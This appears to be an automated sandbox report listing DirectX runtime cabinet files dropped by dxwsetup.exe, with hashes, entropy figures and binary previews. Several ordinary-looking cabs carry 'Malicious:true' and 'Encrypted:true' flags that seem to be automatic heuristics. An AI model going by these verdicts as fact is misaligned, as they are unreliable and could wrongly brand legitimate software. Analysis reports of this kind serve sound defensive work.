                                                                                              Preview:MSCF....vo......D...............g ..........vo...#...................(.........6{. .d3dx9_33_x64.cat.h.D..(....l6O. .d3dx9_33.dll.h.....D....6.. .infinst.exe.,...h.E....6C. .apr2007_d3dx9_33_x64.inf.......E....6B. .d3dx9_33_x64.inf...../.E....6B. .d3dx9_33_x64_xp.inf...'+....[...S g.uM....5!.f...O..v.f.......t.nn$$....d.].Up.$..*...Z2]T.B.FB-.5..I.c3CF3..g....^....=.7....ZF..J.j.c..q..R.....K.6VW..j.9j.+.....J.N.t|6....K..(......-4Fpq...of..@na......A...X.jg..5D...~...........T.....ymsv..f..'"m..k..?..d..=/M..\..3..!.%)....)....v.7l.%.$$.(!RR..@.e.. ........ EfP.h.H......^Q^C.c.u.....u..6......PD...I.\$.J=BX.7..d..H|...h.5zen.Y...KsJ.wk..m.{...KRJ.JJ0t..u/$.N..:..y<...).......)Tjg..GL.=.7.4wGV..|.B.4`.{.})?.#..O..0|.J.NN.9......|u.N_Xi2....$.'..,.......}.j'..... ......I..M...h...&W.$. ..9rs.;.])*...SER.SMDhBS..D.gTFD..0M...E.....D.o..:}du[....b..Y#..`...9.<.'G.:..Q...y'._..|....\1O.o).$..(.')$..`.'oB...jF.%...w....cQ....`.o...k<..[...T....o%

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):198974
                                                                                              Entropy (8bit):7.996718266567073
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
                                                                                              MD5:FBB6AA140D5D0AA28A7561EA15D69E72
                                                                                              SHA1:26804276EDBB1EE23B96690B40A01BB9C723F7DA
                                                                                              SHA-256:7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
                                                                                              SHA-512:08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....n.......D................'..........n....#..........*........).........6.. .xact2_7_x64.cat..E...)....e6Ge .x3daudio1_1.dll.h'...n.....6. .xactengine2_7.dll.h...B......6.. .infinst.exe............6D. .apr2007_xact_x64.inf.....B......6D. .xact2_7_x64.inf.%...E......6D. .xact2_7_x64_xp.inf.t%...8..[......[..1.P$.._.ww.U..UD*:WB...R..%D.J.?III].o7I. .o..7...._..1..3. ......@.......{.tz......-n.....n(..j..Z...m...[.dgi/wb.q...Cl..M.8.jmh|....h&"P`B ..%...c>..... .....D4...P..fo..D.....0.@...m...!...mT.......ir..q+)..r...*...o".D(.@A.)+.(..3..(.G.}.L ..p.....aF..,)..$.cr.1...J..%..|.)..=.K.H..Ep.....K..^...m6.......P....N@..I.|.|.'....@a.. "....H.d...1....&.!D......{.X-..\.S;0NOe.3,&......a.S~..;wd...R.Zt.7...J~..n.'.......J.e..'H.........@.~....T@..........y......8(2....9.p:...^...y...$....X*..b...c.N.Dprnd).$..d.mIv.,G.D.#..A..].1..A.L$].7`...;...L.....B!.....:..EA..1.V..?J.7..7...T.Bz....]..%t.7.F..5G:......."H..O9.....sAk.q.}1U.'I........o.t...jr.`v..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):154433
                                                                                              Entropy (8bit):7.994491966822324
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
                                                                                              MD5:8922189C0A46D26B2C52C65515D87180
                                                                                              SHA1:27830C01AFB15158186A045B7224EF33793AD211
                                                                                              SHA-256:39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
                                                                                              SHA-512:53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
                                                                                              Malicious:true
                                                                                              Preview:MSCF....q7......D...............)#..........q7...#...................).........6.. .xact2_7_x86.cat..;...)....e6Ie .x3daudio1_1.dll.h....d.....6.. .xactengine2_7.dll.o...Bb.....6D. .apr2007_xact_x86.inf......h.....6D. .xact2_7_x86.inf.....:l.....6D. .xact2_7_x86_xp.inf..IL..9..CK..8.....Y.$K%;..93..E.R....cd.....lm.*..5!Zme..!.)e.}.$)....f...z....^]W.\.s.....~~.=....*n.E1.1.P<.t..3.)..B....7....Z...,l.7.*7..b..Q.,l.l....._..Q(.....n....ys..g....D@.Z..........Z1A..R......F.,:.[&"Z....E..rzH...1..)..#..L....p......C...6..z;4....dW"....]...&PR...^.p.0..U...[.a.@...9<.......F..@...h........a..As...g.FJ#.....@...d.BA......0..Xq.7o.-.....S9.....;_....L..x...3`......v..el........./....L9...K..=u^.-s..R...N.>84.~...=%..cG....Mh.....sd3xfG...JsN...6.'.....)./1...S..7....@mZ.....7...W..'..wY.US[Y...`..&'..9.~^.-h..a1.Y(.0?M.].NG.H..@..:......&4v&.Aa..N..~3Z..d.9.....H....x..`.s..L;..f.7jB@.Tc..}.....A%..Ej...&..!_d.i2q..3M........(`.?.c.(4Z..Av...4........?..B

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Apr2007_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1353750
                                                                                              Entropy (8bit):7.999671999388792
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
                                                                                              MD5:A9F4068650DF203CEE34E2CA39038618
                                                                                              SHA1:CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
                                                                                              SHA-256:3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
                                                                                              SHA-512:C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
                                                                                              Malicious:true
                                                                                              Preview:MSCF....F.......D...........................F....#..............w...<..........2.. .d3dx9_27_x64.cat...:.<......2d. .d3dx9_27.dll......7:....29. .infinst.exe.&....-;....2.. .aug2005_d3dx9_27_x64.inf......1;....2.. .d3dx9_27_x64.inf....p.9..[.... x.m......R.P...?-.."..."-..%V"J..J ...E.VPU..*.2jC..UJ...^P.a..T.A..,...;.......YI...K.....!.N...s..f.m...Q.........<X...J]G2.... ..A..l.m........ .......@....2sx2.HH.....@dC...pWCy/....!..k.GVc.).1q.P.=...b.ua.%ER.q...t.>q.?RVa..$..j.|..'..RZ.Y..zn.c......q./.2G2w...|p4Q.Q.F...X./..~......F[$..!.#..Q....$*.P|....tE..../...3....a.....y...'...[6..^@.k...+.y.:..h_h.8..C...I................3.<..*.#....0.x.....?;!.g.......t.p.o...2!.x..M....~.g..~..hH...KIx.g...-....IX.Ru..P....J..{|,.3.#.wz........K...W.Y.....}..d.l...\..P.z...[HoP.....X...f.5.=b....hy......Jw...q.N'r.B........\.x..J..c..`=&.L!...R.......y..]x......~......s..}..'..S|n....%3.=........Z..T..._./(5\[v..r....~.....I.!..cjv).M...x....(&.(../.:q..1.......

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):186111
                                                                                              Entropy (8bit):7.995685991314543
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
                                                                                              MD5:4BA26F9DCCAEBD7BE849A076EC82D6FF
                                                                                              SHA1:42FB0D0089D8BC92735820F475968F59AF4E4365
                                                                                              SHA-256:13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
                                                                                              SHA-512:4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
                                                                                              Malicious:true
                                                                                              Preview:MSCF..../.......D................!........../....#..................! .........4.R .xact2_3_x64.cat..@..! ....C4)E .x3daudio1_0.dll......`.....4.K .xactengine2_3.dll............4.K .infinst.exe.....!......4{R .aug2006_xact_x64.inf............4{R .xact2_3_x64.inf.+.{..9..[.........R.P...O...\7.$Hb...l...RI..(D7...G.)..0..J.zH)J.R..x$..H...........>>.evHh......;....d....xT6@'.u...Q.n...#s.......!.Pq...o...... ......X....,-....h... ......q..G.. ,.........(.~.CzJ8t.P..J.FHR|.D.........` d..PC/.N...I...<.'.o....8.t..t7.....Q.E%.J..8.l......t"....Z....&.(.p.:........n.ML.@..Ny........9......P'.|...w..@.{B!\.h.P.....:.G...t g.."..{.@'..u....z........|......#A..8.q....v..E@..g.@.~.\i@......`9..y.G..p._.b...C%K.....Y...6R3...v"..J.a>.Co.dcEOv&D:...~.A.Y..^......{.x........`n....].D~.E...(..^"..N'....W...g...?....9.}.?.....z.3q.......Y....AV.?_0.w[..F.......CU).76....6.O.C......|...I...@...|..bC..p.S......l... .H<.S.I. .f(..`*^..Y..W...._....0_...._9..yj.+X

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):140443
                                                                                              Entropy (8bit):7.993872348182751
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
                                                                                              MD5:E16F0875713956A6F9CD8C5ACAD36E51
                                                                                              SHA1:984B821EAEF3B549CE0B12F72A405A93E51A9DFE
                                                                                              SHA-256:31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
                                                                                              SHA-512:DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4.R .xact2_3_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.K .xactengine2_3.dll.W..........4{R .aug2006_xact_x86.inf.....`......4{R .xact2_3_x86.inf..v`..8..CK.|.\S...M..ABS............ M....%J3...EP....]W,.X..............]El.;s..t............9s.3g.9wf.#.....W.X...K-..t..>.B.v..t..;....._...C.S.\.)%y.*...Y:.Z .B...<...M^..N....e..v5.]pWG7.+..7........2.<..=...`n..s.'..1w..R7x.!.A..u.H.0g.....~<H.....C.?@]1.......R...<.....m.M...I.B..L..c).....~.m;..M].L......].........+..GT*w..n....!. .3...0Gl .&..;....E..ZW...........+..,*..Z....#bG.v.2...R.~...`.p.....?.q......6.$[.+.8 .............V4...\|Q.Q.....A..^4*........A.o.,.....O/X..^..5.r.....XQ.iGh.|I...r.A:'.p!u.L>.\..i...HgN...)q..q7.c..w...Pbm..a.O%y.......X..ne....2. ...w...`.:..5....]p'.......X.k.Hv..nGR.x..p.-..f...lB.QG6.........`.yn..c..4m.].].]..cXI^....N.=..F.P...-.].....fj..w3n...)..W.r2*.".:&.1|..n..L.V.P"

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xinput_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):90350
                                                                                              Entropy (8bit):7.985841057262195
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
                                                                                              MD5:A9D582E44E46E36F37EDB7CBC761179D
                                                                                              SHA1:ED1BEF64385E94CE89AFA704D38408E23B31FA79
                                                                                              SHA-256:C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
                                                                                              SHA-512:20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....=......D............................=...#.............................4.R .xinput1_2_x64.cat..G.........4.K .xinput1_2.dll......f.....4.K .infinst.exe.V...'m.....4}R .aug2006_xinput_x64.inf.....}p.....4}R .xinput1_2_x64.inf....%p9..CK.[.\SI.....I..1`D...]A......A....D .)4........E]...`.....^VV.........{.\.]......~./w.9s...9sf.E..k.....l@...Y....*...Cu4.....t......I.Q.<u)ey...k1...K0.)....u..+..{..&...Z....@=].X....'..$q*D...y.kZ.+..O..x .....F.@..........A.wd..........;......<@i.. ..s(G..J..".q.#..c.u...=.H<"A.H..C..;.>....43V.4..1y.;..j.yK"F}.F..#.RY.h.u.2.....p.C...u...b.:..E1.?f........H@]..;..DfR.T.%..-.....h....@...;...Z=@..pGb.b... .........n.....b>...R~...J...X...0.?..P7..........p6."/=.Z mI.r..X..x...ey...m#.>Pi.ZY.".....Xi..B..S.....7....=P7k}L..."bB.....;.....)...;..L...`B.PG.8.d..q....e.E*....D.T.$..H..X.A..,6..y.|..4..*.x...K.....o...6`mB.T+.B..0..[..Q4MS.D?.9j.+...<..'.0.9"...5.l-S...8.#H..XF..puM5#.8.R..7..2.L.p..'....\../.....a....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2006_xinput_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Preview:MSCF............D................................#.............................4.R .xinput1_2_x86.cat............4.K .xinput1_2.dll............4}R .aug2006_xinput_x86.inf............4}R .xinput1_2_x86.inf.....>..CK.|.\SG..M.. @...mTT.0.(..D..M...+K0 ..D.`...T.Zkk.Am.V..k...V[l...+....*Z4....P..........&w.3g.9..\.Kz<tp..N.;.]Y...%=.!...b.............%v_88.t`qXK.;......B..3..c.8...................a...aA..C..)t...FP.q.%......'.B...("...D0.(..Al(..BY.<..."...s.!...1....&."...a..;6;h.P.#.X...p.H....c..q,..1.'..^.CL..h.C..h.%......f...S.l.'h.p.p.E.......\..G..1..'.)D>.Cd.JB..u.....6..i..A.>...&.......]..J....C..h."........x.......4....0.H.?..P.=.Z"zEaJU...F./...Y.t...~.o.y9<..9.l..7=.9_..d...!.r.F0...4..c2...a.3..y0..B..nD<.K...s!d.9|...p.0|a.U.a.=x.v$.OM.1u{...qQ,..._.R....y..f"...33...@... ......[..1.a.....0.x8..@.N.`i..0...b..c.wYs.L>&..9..A.......UXL.n..8x.....z......W+..... o.'.v.r...$g....R...4.u.r..J.P+......./o:C...Sg.g.&.3r..^.vG.v^...I.s...9..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx10_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
